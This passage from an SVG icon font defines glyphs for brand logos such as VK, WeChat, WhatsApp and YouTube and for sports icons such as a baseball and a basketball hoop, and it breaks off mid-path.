<glyph glyph-name="vine" horiz-adv-x="1000" unicode="&#xed80;" d="M883 248c-14-3-28-6-43-7-18-2-36-3-54-4-6-1-8-2-11-7-53-108-125-201-214-282-13-12-27-22-43-29-22-9-43-9-64 2-26 13-47 32-68 52-51 50-90 109-123 172-46 88-78 180-103 275-19 75-33 151-43 228 0 2 0 5-1 8h149c2-12 3-24 5-36 18-134 49-266 109-389 30-61 67-118 111-171 1-2 3-4 5-6 61 63 110 134 150 212-1 1-2 2-2 2-71 38-116 98-140 174-20 62-25 125-9 189 13 54 41 99 89 128 39 24 81 31 126 28 29-2 57-9 83-23 44-24 69-63 81-110 5-17 6-35 9-53 0-2 1-5 1-8v-35c-1-12-2-24-4-36-4-32-12-62-24-92-2-4-3-6-8-6-16-1-33-3-49-1-27 3-50 15-68 37-4 4-4 7-3 12 10 34 16 69 14 105-1 19-4 37-13 53-18 31-58 35-82 8-9-11-14-23-17-36-9-36-7-72 2-108 12-52 38-94 85-122 53-31 109-33 168-19l-1-105z" />
<glyph glyph-name="virb" horiz-adv-x="1000" unicode="&#xed81;" d="M471 83h-192l-216 534h185l128-349 128 349h179l-212-534z m467 442c0 50-41 90-91 90-50 0-91-40-91-90 0-50 41-90 91-90 50 0 91 40 91 90z" />
<glyph glyph-name="virtuemart" horiz-adv-x="1000" unicode="&#xed82;" d="M817 651l-2-1s-19-19-34-55c0 0-17-51-24-167 0 0-1-120-36-192 0 0 27-11 20-53 0 0-4-48-40-43 0 0-19 4-22 40l-89-59s20-50-19-83c0 0-32-26-52 17 0 0-18 46 21 77l-19-4s-17-17-20-39c0 0-1-12-4-17 0 0-6-6-62-6 0 0-76 2-104 10 0 0-11-33-34-31 0 0-33 1-28 59 0 0-15 14 4 38 0 0 23 27 92 57 0 0 42 18 51 24 0 0 18 7 25 34 0 0-62-7-90 3 0 0-29 6-52 23 0 0-16 5-38 91 0 0-23 81-13 110 0 0 23 80 221 124 0 0 11 68 82 86 0 0 25 1 28-2 0 0 2-2 2-7l203-3c-76 66-175 106-284 106-242 0-437-196-437-438s195-438 437-438 438 196 438 438c0 117-46 223-121 301z m-259 31s-57-22-56-86c0 0 170 0 185-16 0 0-170 5-189 0 0 0-14-61-17-72 0 0 1-20-3 62 0 0 2 12-22 7 0 0-103-19-158-78 0 0-31-33 14-42 0 0 42-8 87-7l38-143-19 141 15 1 29-133-13 134 16 3 25-130-10 133 14 2 22-125-3 128 14 4 18-126 1 129 17 4 12-127 7 130 17 5 5-136 10 140 18 7 1-138 16 143 19 8-5-142 22 148 18 12-7-153 35 177s24 108 77 114c0 0-46-30-56-106 0 0-14-88-18-165 0 0-7-93-25-129 0 0-31-15-41-68l-86-57s1 8-18 10c0 0 64 38 95 66 0 0 20 23 23 59 0 0 4 33 9 40 0 0-85-31-208-35 0 0 6-46-30-64 0 0-111-55-122-66 0 0-15-12-14-17 0 0 1-20 72-26 0 0 67-5 104 8 0 0-5-3-8-22 0 0-75-7-140 4 0 0-51 6-59 24 0 0-6 16 41 43 0 0 14 12 88 47 0 0 27 12 37 36 0 0 6 30 10 36 0 0-107-21-147 22 0 0-20 22-41 132 0 0-11 47 8 65 0 0 41 63 207 95 0 0 8 84 69 90z m5-10s226-3 234-3c0 0-24-6-46-25 0 0-184 9-200 7 0 0-15 1-7 9 0 0 10 9 19 12z m-30-30s-4-4 34-4l179-8s-21-37-31-80h-10s-57-34-111-47c0 0-104-36-224-34 0 0-88-1-55 23 0 0 50 53 146 70l13-83 8 3 29 83s94 6 194-2c0 0 8 32-34 39 0 0-48 12-148 9 0 0 2 21 10 31z m-31-383s95-3 163 24c0 0 3-40-36-71 0 0-29-31-108-71 0 0-26-17-65-22 0 0-76-7-111 11 0 0-11 5 95 53 0 0 6-26 24-23 0 0 27 6 20 54 0 0 16 10 18 45z m73-146c-12 16-29 4-29 4-18-13-18-39-18-39 3-20 13-27 13-27 18-12 32 9 32 9 19 33 2 53 2 53z m-16-50s-12-2-13 9c0 0 11-1 12 14 0 0 1 11-10 13 0 0 24 20 27-9 1 0 2-26-16-27z m164 154c-16 17-29-10-29-10-10-32 3-47 3-47 13-16 26 4 26 4 19 32 0 53 0 53z m-4-49s-11-6-15 5c0 0 4 1 5 11 0 0 2 11-7 13 0 0 11 22 22 5 0 0 11-21-5-34z" />
<glyph glyph-name="vk" horiz-adv-x="1000" unicode="&#xed83;" d="M491 103h52s16 1 24 10c7 8 7 23 7 23s-1 70 32 81c32 10 73-68 117-98 33-23 58-18 58-18l117 2s61 3 32 51c-3 4-17 36-87 101-73 68-64 57 25 175 53 71 75 115 68 134-6 17-46 13-46 13l-131-1s-10 1-17-3c-7-4-12-14-12-14s-21-56-48-103c-59-99-82-104-92-98-22 14-17 57-17 88 0 97 15 137-28 147-15 4-25 6-62 6-47 1-86 0-109-11-15-7-26-23-19-24 8-2 28-6 38-20 14-18 13-59 13-59s8-114-18-128c-17-10-42 10-94 100-27 47-47 98-47 98s-4 9-11 14c-8 7-20 9-20 9l-125-1s-19-1-26-9c-6-7 0-22 0-22s98-229 209-345c101-105 217-98 217-98" />
<glyph glyph-name="wechat" horiz-adv-x="1000" unicode="&#xed84;" d="M158 135c8 25 16 51 25 76 4 10 2 14-7 21-57 42-98 95-110 166-15 93 17 170 86 230 133 116 346 111 473-12 34-33 58-72 70-119 2-11 1-14-11-14-86 4-163-20-225-80-64-61-88-134-65-221 4-12 0-14-11-14-34 1-67 3-99 14-14 4-25 3-38-4-25-15-51-28-77-42-3-1-5-4-11-1z m157 400c1 23-19 44-43 44-24 1-44-19-45-43 0-23 20-44 43-45 25-1 45 18 45 44z m220-1c1 24-19 45-43 45-24 1-44-18-45-42-1-24 18-45 41-46 25-1 46 18 47 43z m149-66c75-2 152-31 209-101 67-84 57-203-23-277-5-4-9-9-14-13-21-17-21-17-13-43 3-11 7-21 11-32 1-4 2-9-2-13-4-3-7 2-10 3-18 10-37 19-55 30-11 7-22 6-35 3-96-24-186-11-266 50-113 86-113 244-1 331 53 41 114 62 199 62z m-97-119c-18 0-34-17-34-35 0-19 17-36 36-36 19 1 34 17 34 36 0 19-16 35-36 35z m212-35c0 19-16 35-36 35-19-1-34-17-34-36 0-19 17-35 35-35 19 0 35 17 35 36z" />
<glyph glyph-name="weibo" horiz-adv-x="1000" unicode="&#xed85;" d="M937 492c-10 129-117 227-260 208-18-3-37-2-41-24-9-51 47-35 71-35 84 0 170-70 169-171-1-35-29-93 24-88 32 3 40 61 37 110z m-233-117c14 34 22 80 0 105-49 57-160-2-212-5 24 74-3 150-93 127-84-21-145-66-203-125-61-61-123-132-132-225-11-107 57-161 122-198 194-110 506-49 609 96 14 20 29 52 32 75 12 100-62 116-123 150z m-66-235c-53-61-166-101-278-93-98 6-231 64-206 186 11 54 55 90 93 112 46 27 91 41 157 47 120 10 273-35 273-157 1-39-19-73-39-95z m152 281c21 1 32 34 27 71-7 52-53 95-115 90-14-1-39 2-39-26 0-39 43-17 71-30 14-6 30-29 32-49 2-32-12-58 24-56z m-399-98c-83-8-162-80-129-171 49-135 321-62 269 95-16 48-69 84-140 76z m-29-186c-64-15-75 68-17 81 69 16 63-70 17-81z m44 84c0 24 32 27 34 9 2-15-23-29-34-9z" />
<glyph glyph-name="whatsapp" horiz-adv-x="1000" unicode="&#xed86;" d="M508 788c-235 0-426-191-426-427 0-80 22-156 61-220l-77-229 236 76c61-34 131-53 206-53 235 0 426 191 426 426s-191 427-426 427z m209-574c-9-25-43-45-71-51-18-4-43-7-125 27-106 44-173 151-179 158-5 7-42 56-42 108s26 76 37 87c8 9 23 13 36 13 5 0 9 0 12-1 11 0 16-1 23-17 9-21 30-73 32-78 3-5 5-12 2-19-4-7-7-11-12-17-5-6-10-10-16-17-4-6-10-12-4-22 6-11 27-45 58-73 40-35 73-47 85-51 8-4 19-3 25 4 8 8 18 23 28 37 7 10 16 11 26 7 9-3 60-28 71-33 11-6 18-8 20-13 2-4 2-25-6-49z" />
<glyph glyph-name="xing" horiz-adv-x="1000" unicode="&#xed87;" d="M601-88l-196 344 304 532h204l-303-532 196-344h-205z m-321 265l152 250-114 201h-193l114-201-152-250h193z" />
<glyph glyph-name="yahoo" horiz-adv-x="1000" unicode="&#xed88;" d="M893 744s-6 1-11 1c-25 0-50-15-50-54-16-191-31-383-57-565 15 2 28-2 40-6 29 185 99 463 116 542 3 11 7 24 7 33 0 28-18 44-45 49z m-301 9c-30-56-141-238-212-354-71 119-156 256-211 354-44-9-63-10-106 0 86-131 226-380 273-462l-6-341s30 5 50 5c23 0 51-5 51-5l-6 341c88 155 234 408 274 462-38-9-73-9-107 0z m180-704c-34 0-50-26-50-53 0-32 25-49 57-49 23 0 48 14 48 52 1 31-23 50-55 50z" />
<glyph glyph-name="yelp" horiz-adv-x="1000" unicode="&#xed89;" d="M583 229c-15-15-3-42-3-42l111-185s19-25 34-25c16 0 32 13 32 13l88 126s9 16 9 29c0 20-29 26-29 26l-208 66s-21 6-34-8z m-11 94c11-18 40-13 40-13l208 61s28 11 32 26c4 16-5 34-5 34l-99 117s-8 15-26 16c-20 2-32-22-32-22l-117-184s-11-19-1-35z m-98 72c24 6 28 41 28 41l-1 296s-4 36-20 46c-26 16-34 8-41 7l-173-64s-16-6-25-20c-13-20 13-49 13-49l179-245c0 0 18-18 40-12z m-42-120c0 23-28 37-28 37l-185 93s-28 11-41 4c-10-6-19-17-20-27l-12-149s-2-25 5-37c9-17 40-5 40-5l217 48c8 5 23 6 24 36z m53-80c-18 9-41-10-41-10l-144-160s-18-24-14-39c4-14 12-21 22-26l145-46s18-4 31 0c19 6 16 35 16 35l3 216c0 0-1 21-18 30z" />
<glyph glyph-name="youku" horiz-adv-x="1000" unicode="&#xed8a;" d="M456 665c-13 0-27-3-38-11-26-18-40-72-57-110-19-42-35-85-53-116-50 56-83 180-143 226-19 15-61 14-80 0-52-39 0-107 20-143 46-79 96-163 134-235-25-66-151-251 18-241 41 27 58 81 80 131 46 102 84 189 131 294 20 44 67 109 57 158-6 28-37 47-69 47z m408-40c-24 0-49-12-60-34-17-20-36-39-56-56-10-12-21-23-33-33-14-15-25-32-44-42v116c-1 64-119 64-119 0v-330c5-23 16-41 41-44h36c24 4 38 19 42 44v72c0 24-5 66 11 41 25-23 59-49 90-77 29-27 58-71 89-77 64-14 92 47 68 92-25 47-97 77-128 119 21 48 135 77 125 161-4 32-33 48-62 48z" />
<glyph glyph-name="youtube" horiz-adv-x="1000" unicode="&#xed8b;" d="M333 594v-135h49v134l29 94c16 52 30 95 31 97 1 3-4 4-25 4h-25l-4-13c-2-7-9-35-17-62s-13-50-14-50-8 27-17 60c-8 33-16 61-17 62-1 2-12 2-26 2l-24-1 30-96 30-96z m271-121c3-5 7-11 11-13 8-4 25-4 35 0 4 2 13 8 19 14l12 10v-25h46v246h-46v-189l-9-9c-10-10-18-14-24-9-3 3-3 18-3 105v102h-47l1-111c0-104 1-113 5-121z m-152 3c8-9 15-14 25-17 16-6 24-6 41-1 17 5 35 21 41 38 3 11 4 22 4 85 0 79-1 87-16 105-22 27-74 27-96 1-16-18-17-26-17-105 0-82 1-88 18-106z m30 179c6 13 27 13 33 0 2-4 3-29 3-75 0-71-1-79-11-83-2-1-6-1-9-1-18 0-19 5-19 85 0 45 1 70 3 74z m99-441c-6 2-9 2-18-3l-11-6v-149l9-5c12-7 16-7 25 0l6 6 1 68c1 76 0 85-12 89z m282-26c-1 44-3 91-4 104-8 71-30 105-77 117-24 6-89 9-229 10-129 2-261-1-312-6-52-6-80-31-93-83-13-58-16-225-5-305 4-22 14-52 22-66 22-33 54-41 173-45 80-3 320-1 378 2 54 3 67 6 86 15 51 25 64 81 61 257z m-540 101h-26v-280h-49v280h-51v46h153v-46h-27z m149-159v-121h-46v25l-11-10c-6-5-14-12-18-14-11-5-32-5-40 2-13 9-14 19-14 135v105h46v-99c0-88 1-101 4-104 6-6 11-4 22 7l11 11v185h46v-122z m167-11c0-78 0-80-6-92-3-6-9-13-14-16-9-6-28-6-39-1-4 2-12 7-18 12l-10 9v-22h-44v326h44v-105l12 10c11 10 25 17 35 17 11 0 24-8 30-18 10-17 11-33 10-120z m163-46c-2-33-12-51-36-62-16-7-43-7-60 2-15 7-25 19-31 35-4 9-5 22-6 75-1 82 2 98 23 117 13 11 25 15 43 15 21 1 36-5 49-20 15-17 19-31 19-76v-36h-88v-28c0-23 1-31 4-38 6-11 17-14 27-8 8 5 11 13 11 30v15h47l-2-21z m-45 87v18c0 23-5 34-14 36-20 5-28-6-28-36v-18h42z" />
<glyph glyph-name="zencart" horiz-adv-x="1000" unicode="&#xed8c;" d="M153 3h694v694h-694v-694z m260 326s-22-25-25-79c0 0-2-37 11-121 0 0 9-52 12-60 0 0 11-39-20-31 0 0-30 5-55 40 0 0-56 70-40 178 0 0 3 88 64 139 0 0 50 53 127 44 0 0 44-3 25-34 0 0-18-15-28-22 0 0-55-33-71-54z m327-167s-28-51-101-66c0 0-59-13-125 37 0 0-54 39-62 93 0 0-7 59 29 104 0 0 43 54 51 5 0 0 3-58 9-75 0 0 19-53 87-57 0 0 43-4 82 12 0 0 33 11 45 1 0 0 18-6-15-54z m-176 285s19 23 56 16c16-3 39-18 46-43 0 0 23-64-36-85 0 0-46-15-77 21 0 0-31 38 11 91z m-57 216s24 15 66 3c0 0 88-24 158-122 0 0 83-126 24-218 0 0-13-24-36-32 0 0-20-9-15 31 0 0 4 70-17 108 0 0-22 63-85 98 0 0-55 40-72 50 0 0-31 23-41 37 0 0-24 27 18 45z m-324-306s22 77 101 133c0 0 70 47 159 51 0 0 48 4 86-16 0 0 43-17 13-37 0 0-51-18-79-23 0 0-60-14-115-53 0 0-44-35-64-65 0 0-32-50-45-57 0 0-23-29-52-6 0 0-24 23-4 73z m16 431l-7-50 404 1-397 49z m689-131l1-403 49 396-50 7z m-81-745l7 50-398 0 391-50z m-744 136l49-6v402l-49-396z" />
<glyph glyph-name="badminton-birdie" horiz-adv-x="1000" unicode="&#xed8d;" d="M320-58l661 397-80 139-114 30-64 125-115 31-77 138-136 48-303-708 2-3c-11-4-23-12-35-26-58-66-51-166 15-224 66-57 166-51 223 15 13 14 19 27 23 38z m3 33l-9 8c-12 22-36 44-63 68l215 174c61-44 114-67 145-78l-288-172z m60 322c13-12 26-24 38-35 8-7 16-14 24-20l-209-170 147 225z m501 158l61-107-304-182c-15 3-76 22-153 77l294 239 102-27z m-179 156l57-111-296-240c-22 17-44 37-67 60l208 317 98-26z m-193 169l73-128-205-312c-38 41-75 90-110 151l139 326 103-37z m-255-319c35-58 71-105 108-144l-153-233c-28 25-53 47-78 55l-11 10 134 312z" />
<glyph glyph-name="baseball" horiz-adv-x="1000" unicode="&#xed8e;" d="M900 220l-64 22 34 93c-27 11-54 23-80 38l-45-79-58 33 45 81c-29 21-57 44-84 70l-64-64-48 48 65 64c-23 28-44 56-62 85l-86-39-28 61 82 37c-12 25-22 49-30 74l-111-26-15 66 109 25c-3 13-5 26-7 39-112-10-221-58-307-144-85-86-134-195-144-307 18-2 37-6 55-10l38 108 64-23-37-104c26-10 52-21 78-35l50 88 59-33-51-90c29-19 57-41 84-66l70 69 47-48-70-69c24-26 45-54 63-82l90 41 28-61-83-38c12-24 22-49 31-73l111 25 15-65-107-25c5-18 8-36 10-54 112 10 221 58 307 144 86 86 134 195 144 307-21 3-42 7-64 12l-34-95z m-318 618l15-66-59-14c7-21 15-41 25-62l78 36 28-62-72-33c14-22 31-45 49-66l59 58 47-48-60-59c23-22 47-42 71-59l40 71 59-33-42-74c23-13 47-24 70-33l26 72 64-23-25-69c15-4 30-7 45-9-3 123-52 245-146 339-94 94-216 142-339 146 1-9 3-18 5-27l62 15z m-169-961l-15 66 59 13c-7 21-16 41-27 62l-76-35-28 62 69 31c-15 22-32 43-50 64l-54-54-48 48 55 54c-23 20-46 39-71 56l-35-63-59 33 37 65c-23 12-46 22-69 30l-22-60-63 23 20 56c-12 3-24 5-36 7 4-123 53-245 146-339 94-94 216-142 339-146-2 14-4 28-8 42l-64-15z" />
<glyph glyph-name="baseballer" horiz-adv-x="1000" unicode="&#xed8f;" d="M624 680c46 0 84 38 84 85s-38 85-84 85c-47 0-85-38-85-85 0-47 38-85 85-85z m196-168c1 0 0 49 0 49-7 93-115 92-115 92h-171c-122-3-117-92-117-92v-8l-172 198c-15 15-39 15-54 0-15-15-15-39 0-54l216-188c3-4 7-7 10-10v-31c0-22 16-38 35-38 10 0 19 4 25 10-19-12-28-32-22-50 8-19 31-27 56-22v-46l-39-221 38-203c0-26 22-48 49-48 27 0 48 22 48 48l-38 209 38 223h22l77-432c1-27 22-48 48-48 27 0 49 22 49 48l-66 553 47 18c21 8 35 26 36 43z m-309 34v-90l-23 23v67h23z m214 0h24l3-1-25-9-2 10z" />
<glyph glyph-name="basketball-hoop" horiz-adv-x="1000" unicode="&#xed90;" d="M1000 712c0-23 0-47 0-70 0-2 0-3-3-3-21 0-43 0-64 0-2 0-3-1-4-2-34-35-64-74-90-116-33-54-59-111-76-172-7-25-13-50-17-75-4-26-7-52-8-78-2-23-1-46 0-69 1-16 2-32 4-48 1-17 4-33 7-49 0-4 1-8 0-12-2-6-8-11-15-10-15 1-28 7-41 12-20 7-39 15-58 23-2 0-3 0-5-1-25-14-50-27-77-38-17-6-33-12-51-16-1 0-3 0-4 0-32 7-62 20-91 35-13 6-25 12-37 19-2 1-3 1-5 1-26-12-52-22-79-31-7-2-14-4-21-4-9-1-16 7-15 16 2 9 3 18 5 27 2 11 3 22 4 34 2 18 3 36 4 55 0 19 0 39-1 58-1 18-2 36-4 53-4 25-8 48-14 72-16 65-41 126-74 183-28 48-61 91-99 131-1 1-2 2-4 2-22 0-45 0-67 0 0 24 0 47 0 71 0 2 0 2 2 2 42 0 83 0 125 0h873z m-533-583c-26 16-50 33-74 50-2 1-2 1-4 0-30-17-60-33-92-47-2-2-2-3 0-5 23-16 47-32 71-46 1-1 2-1 3 0 18 8 35 16 52 24 15 8 30 16 44 24z m66 0c32-18 64-34 96-48 1-1 2 0 3 0 24 15 48 30 71 46 2 2 2 3-1 5-31 14-61 30-91 47-1 1-2 1-4 0-15-12-31-23-47-33-9-6-18-11-27-17z m-127-69c0 0 1-1 2-1 8-4 17-9 25-13 21-9 42-18 65-24 1 0 2-1 3 0l11 3c25 7 49 18 73 30 3 2 6 3 10 5-1 1-2 1-3 2-30 14-60 29-89 46-2 1-3 1-5 0-27-15-55-30-83-43-3-2-6-3-9-5z m165 579h-24c-9 0-18 0-27 0-1 0-3 0-3-1 0-2 0-4 0-6 1-11 3-21 6-30 9-34 24-65 44-93 2-2 2-1 3 0 24 40 42 82 55 127 0 2 0 3-2 3-17 0-35 0-52 0z m-142 0c-17 0-34 0-51 0-4 0-3 0-3-3 13-44 31-85 54-124 3-5 3-5 6-1 21 32 37 66 45 104 2 7 4 14 3 21 0 2-1 3-3 3-17 0-34 0-51 0z m-7-441c26-18 51-34 77-50 1 0 2 0 3 1 26 15 50 31 75 48 0 0 1 1 1 1-27 17-52 34-76 52-2 1-3 1-4 0-24-18-49-35-74-50-1-1-1-1-2-2z m220 384c-3-6-5-11-7-17-12-29-27-56-44-83-1-2-1-2 1-4 15-17 31-32 48-46 2-2 2-1 3 0 16 19 30 38 44 58 2 2 2 3 0 5-15 23-28 46-39 72-2 5-4 10-6 15z m-284 0c-1 0 0-1-1-1-11-31-26-60-45-87-1-1 0-2 0-3 14-21 29-40 45-59 1-1 1-2 3 0 17 14 33 29 48 46 2 1 2 2 1 4-15 23-28 47-39 72-4 9-8 18-12 28z m-67-59c1 0 1 1 2 2 22 34 37 72 47 111 1 3 0 3-2 3-34 0-69 0-103 0h-3c16-41 36-79 59-116z m477 116c-36 0-72 0-107 0-2 0-1-1-1-2 9-37 23-71 42-104 2-3 4-7 7-10 23 37 43 75 59 116z m-268-74c0-1-1-1-1-1-11-31-27-58-46-84-2-2-1-3 0-4 14-19 29-37 45-55 2-1 2-1 4 0 16 18 31 36 45 55 1 1 2 3 0 5-17 22-31 46-42 72-2 4-3 8-5 12z m107-345c1 0 1 0 2 1 18 14 35 28 52 43 3 2 3 2 0 3-28 14-56 29-82 46-2 1-3 1-4 0-15-14-30-27-46-39-2-1-2-2 0-3 25-18 50-35 76-51 1 0 1 0 2 0z m-135 52c0 1 0 1-1 2-16 12-31 25-46 39-1 1-2 1-3 0-27-17-54-32-83-46-2-1-2-1 0-3 17-15 34-29 53-43 1-1 2-1 3 0 11 6 22 13 33 20 15 10 29 20 43 30 0 0 1 0 1 1z m253 65c1 1 0 2-1 2-7 4-15 8-22 12-18 10-36 21-53 33-1 1-2 1-4 0-13-16-28-30-42-45-2-1-1-2 0-3 27-17 56-32 85-45 2 0 3 0 4 1 9 9 19 19 29 29 0 1 1 1 1 2 1 5 2 9 3 14z m-450 0c1-4 2-8 3-12 0-1 0-2 1-3 10-10 20-20 30-30 1-1 2-1 3-1 29 14 58 28 85 45 2 1 1 2 0 3-14 15-28 29-42 44-1 2-2 2-4 1-12-9-25-17-38-25-12-7-24-13-36-20-1 0-3 0-2-2z m506 250c0-1 0-1-1-2-14-31-31-61-49-90-1-1-1-2 0-3 10-13 22-25 34-36 2-1 2-1 3 1 12 28 27 55 43 81 1 1 1 2-1 3-7 7-14 15-19 24-3 7-7 14-10 22z m-562 0c-1-2-2-3-2-4-6-16-15-31-28-42-1-1 0-2 0-3 4-7 8-13 12-19 11-20 22-41 32-62 0-2 1-2 2-1 12 11 23 23 34 35 1 2 1 3 0 5-16 25-31 51-44 78-2 4-4 8-6 13z m352-135c-15-19-30-37-46-54-2-1-1-2 0-3 15-13 31-26 47-37 1-1 2-1 3 0 15 15 30 30 44 45 1 2 1 2 0 4-16 13-32 27-46 42 0 1-1 2-2 3z m-141 0c-1-1-1-1-2-1-14-16-30-31-47-45-1-1-1-1 0-2 14-16 29-31 44-46 1-1 2-1 3 0 16 11 32 24 47 37 1 1 1 2 0 3-9 10-18 20-27 30-6 8-12 16-18 24z m-140 13c-14-15-27-29-42-41-1-1-1-2 0-3 6-16 12-32 17-49 0-1 1-1 2-1 22 12 43 24 63 38 2 1 1 2 0 3-4 5-8 11-13 16-9 12-18 25-27 37z m420 0c-13-18-26-36-40-53-1-1-1-2 0-3 20-14 41-26 63-37 1-1 2-1 3 1 5 16 10 32 16 47 1 2 1 3-1 5-12 9-23 20-33 31-2 3-5 6-8 9z m-210-172c1 0 1 1 1 1 16 12 31 25 46 38 2 1 2 2 0 3-16 12-31 24-46 38-1 1-1 0-2 0-15-14-30-26-46-38-1-1-2-2 0-3 15-13 30-26 46-38 0 0 0-1 1-1z m-330 275c5 5 9 11 12 17 8 16 12 33 16 50 0 3-1 4-4 4-25 0-51 0-77 0-1 0-1 0-2-1 20-22 38-46 55-70z m660 0c17 24 36 48 56 71-1 0-2 0-2 0-26 0-53 0-79 0-2 0-3-1-3-3 0-1 1-2 1-3 3-16 7-32 15-47 3-7 7-13 12-18z m-468-366c-20 16-39 32-57 49-1 1-2 1-3 0-3-1-6-2-8-3-2 0-3-1-3-3 2-11 3-22 4-33 1-14 1-28 1-42 0-1 0-2 1-2 22 10 44 22 65 34z m342-35c0 2 0 3 0 4 0 17 1 34 2 51 1 8 2 16 3 23 0 2-1 2-2 3-3 1-6 2-8 3-1 1-2 1-3 0-18-17-37-33-56-48-2-1-2-2 0-3 11-6 23-12 35-18 9-5 19-10 29-15z m-416-119c15 5 29 10 44 16-13 9-26 17-38 25-1 1-1 0-1-1-1-8-2-15-3-22-1-6-1-12-2-18z m424 0c0 1 0 1 0 2-2 12-3 25-4 37-1 3-1 3-3 1-11-7-23-15-35-22 0 0-1-1-1-2 14-5 28-11 43-16z" />
<glyph glyph-name="basketball" horiz-adv-x="1000" unicode="&#xed91;" d="M498 329l-325-357c87-76 194-116 301-122 7 24 19 74 18 127 0 73 0 181 84 280l-78 72z m-101 91c-91-93-199-103-271-109-51-5-98-20-121-29 14-107 63-210 146-290l324 357-78 71z m99-49l328 361c-89 75-196 114-304 118-7-23-19-73-19-127 0-73 0-181-83-281l78-71z m100-91c92 93 199 103 271 109 57 5 108 24 128 32-15 107-65 210-149 290l-328-360 78-71z m-73-303c0-52-10-100-18-127 129 1 257 52 353 151l-260 236c-76-91-75-188-75-260z m-148 463l-256 234c-88-104-127-234-118-361 27 9 72 23 122 28 72 6 168 15 252 99z m624-50c-26-10-74-26-129-31-71-6-168-15-251-99l260-237c90 105 130 238 120 367z m-528 333c0 52 10 100 17 127-128-3-254-55-349-154l256-233c76 91 76 188 76 260z" />
<glyph glyph-name="billiard-ball" horiz-adv-x="1000" unicode="&#xed92;" d="M500 850c-276 0-500-224-500-500 0-276 224-500 500-500 276 0 500 224 500 500 0 276-224 500-500 500z m0-742c-134 0-242 108-242 242s108 243 242 243 243-109 243-243-109-242-243-242z m42 252c39 19 52 48 52 74 0 39-31 76-91 76-55 0-96-33-96-82 0-27 15-54 49-70-37-17-61-46-61-85 0-45 39-83 104-83 60 0 106 35 106 90 0 37-24 65-63 80z m-95 71c0 26 19 49 54 49 38 0 52-25 52-50 0-28-20-47-47-57-36 10-60 27-59 58z m53-211c-39 0-63 28-62 59 0 30 20 54 56 64 42-12 68-30 68-67 0-32-24-56-62-56z" />
<glyph glyph-name="boot-alt-1" horiz-adv-x="1000" unicode="&#xed93;" d="M980 451c-6 23-22 33-43 36-20 4-36-3-47-21-19-29-46-37-78-34-44 6-83 24-118 51-5 4-7 6 0 10 26 17 52 35 78 52 24 16 24 44 1 61-5 4-10 7-14 11-23 16-51 15-71-4-20-17-40-34-59-51-3-3-6-5-11-4-15 4-29 1-42-6-13-7-26-15-38-22-5-2-5-4-2-8 7-6 13-13 19-20 4-5 7-5 11-2 10 6 20 12 30 17 9 5 15 4 19-4 14-28 36-49 62-67 38-28 80-48 128-53 49-6 90 7 118 51 2 3 5 5 9 3 5-1 9-3 10-9 14-47 20-94 17-143-4-44-13-85-38-122-3-6-8-8-14-8-17 0-34 0-51-1-6-1-10 1-12 7-15 33-33 64-57 91-64 74-144 113-242 114-5 0-10-1-14-5-9-9-5-24 8-28 12-4 24-6 36-10 83-29 139-87 177-165 3-6 0-6-5-6-30-1-60-2-90-3-5 0-7 1-9 5-3 9-7 18-12 26-45 72-108 113-194 116-12 0-17-3-18-10-1-8 3-12 14-14 67-16 112-56 143-116 4-7 3-8-5-8-51 0-102-2-153-5-11-1-21-1-28 10-1 2-3 3-6 1-2-3-3-4 0-7 1-1 3-1 2-5-25 0-51 0-76 2-2 0-5 0-4 3 4 7-3 8-5 12-2 2-4 2-5 0-2-2-4-4-1-6 2-3 5-4 6-8-24 2-47 4-70 8-3 1-6-1-5 5 1 5-6 7-11 10-1 0-3-2-4-4-1-1-1-2 1-4 1-1 4-1 4-5-54 9-107 24-159 43-11 5-18 13-20 25 1 0 2 0 3 0 2 0 6-3 7 2 1 5-2 6-6 6-6 0-6 4-5 8 2 7 9 11 12 16 4 8 11 10 18 12 12 3 24 5 36 7 4 1 9 1 14-1 4-2 14-7 16 5 0 1 2 1 4 2 6 1 12 2 18 3 46 7 88 23 127 47 5 3 5 5 1 8-6 6-11 12-16 19-5 7-9 6-16 2-20-12-42-21-65-28-39-11-80-16-120-23-34-6-61-29-68-61-7-31 6-62 36-81 8-6 15-12 17-22 3-11 10-19 21-22 8-2 16-5 24-8 13-5 22-2 29 11 2 4 5 5 8 4 8-3 14-7 17-15 4-18 16-27 34-30 5-1 10-3 15-4 21-6 29-2 36 19 1 4 2 6 7 6 17-1 32-4 38-23 3-8 11-12 21-13 13-2 26-5 39-7 12-1 23 6 27 17 2 5-1 13 5 15 4 2 10 1 15 1 2 0 4 0 5 0 15 4 25-2 32-15 4-7 10-13 18-13 15-1 29-3 43-3 12-1 22 8 24 20 0 4 1 7 1 11 0 3 1 5 4 5 36 1 72 2 107 3 24 0 47 1 71 2 6 0 10-1 12-7 5-8 12-14 21-14 14-1 28-2 42-2 11-1 19 6 22 17 1 6 3 8 9 8 13 0 27-3 40-2 8 1 12-2 15-8 4-7 11-10 19-11 12-1 24-2 36-3 7 0 11 3 15 9 4 5 4 11 4 17 0 5 1 8 5 11 21 17 32 41 42 64 19 41 19 85 22 128 2 44-8 87-20 129z m-411-31c7-8 17-8 23-2 7 7 7 17 0 25-25 28-51 55-77 84-3 3-7 5-13 6-6 0-11-3-14-9-3-7-2-13 3-19 26-28 52-57 78-85z m-77-30c6-7 16-7 22-2 7 6 8 16 2 23-1 2-3 4-5 6-22 24-43 48-65 72-4 4-8 6-13 7-7-1-12-4-15-10-3-6-2-12 3-17 23-27 47-53 71-79z m-81-34c3-4 7-6 12-6 7 0 11 2 15 8 3 5 3 11-1 16-1 3-3 5-5 7-19 22-39 44-58 65-8 9-18 11-25 4-8-6-8-16 0-25 21-23 41-46 62-69z m-114 0c11-12 21-24 32-36 5-5 11-7 18-4 7 3 10 8 10 15 0 5-2 9-6 13-17 20-35 40-53 60-7 9-16 10-24 3-7-6-7-17 0-25 8-9 16-17 23-26z m56 22c13 9 14 8 3 20-5 6-10 17-17 17-7 1-15-7-23-11 6-8 13-15 19-23 5-7 10-8 18-3z m87 51c-7 6-13 13-19 20-2 2-3 4-5 6-2 3-4 3-8 2-18-10-18-10-4-25 16-18 16-18 36-3z m31 51c4-5 8-9 12-13 9-10 9-10 20-3 4 2 5 4 1 8-6 7-13 14-19 21-2 2-3 4-7 3-4-2-9-4-12-8-2-2 3-5 5-8z m-176-245c-2 6-8 5-12 9-3-1-5-4-4-6 2-5 8-6 13-8 2 0 4 4 3 5z m-126 44c0 8-7 4-11 6-3 2-6 1-6-4 1-7 8-2 10-6 4 0 7 0 7 4z m195-93c-4-6 3-7 5-10 2-2 5-5 8-1 1 1 1 2 2 3 0 2-11 11-13 10-1 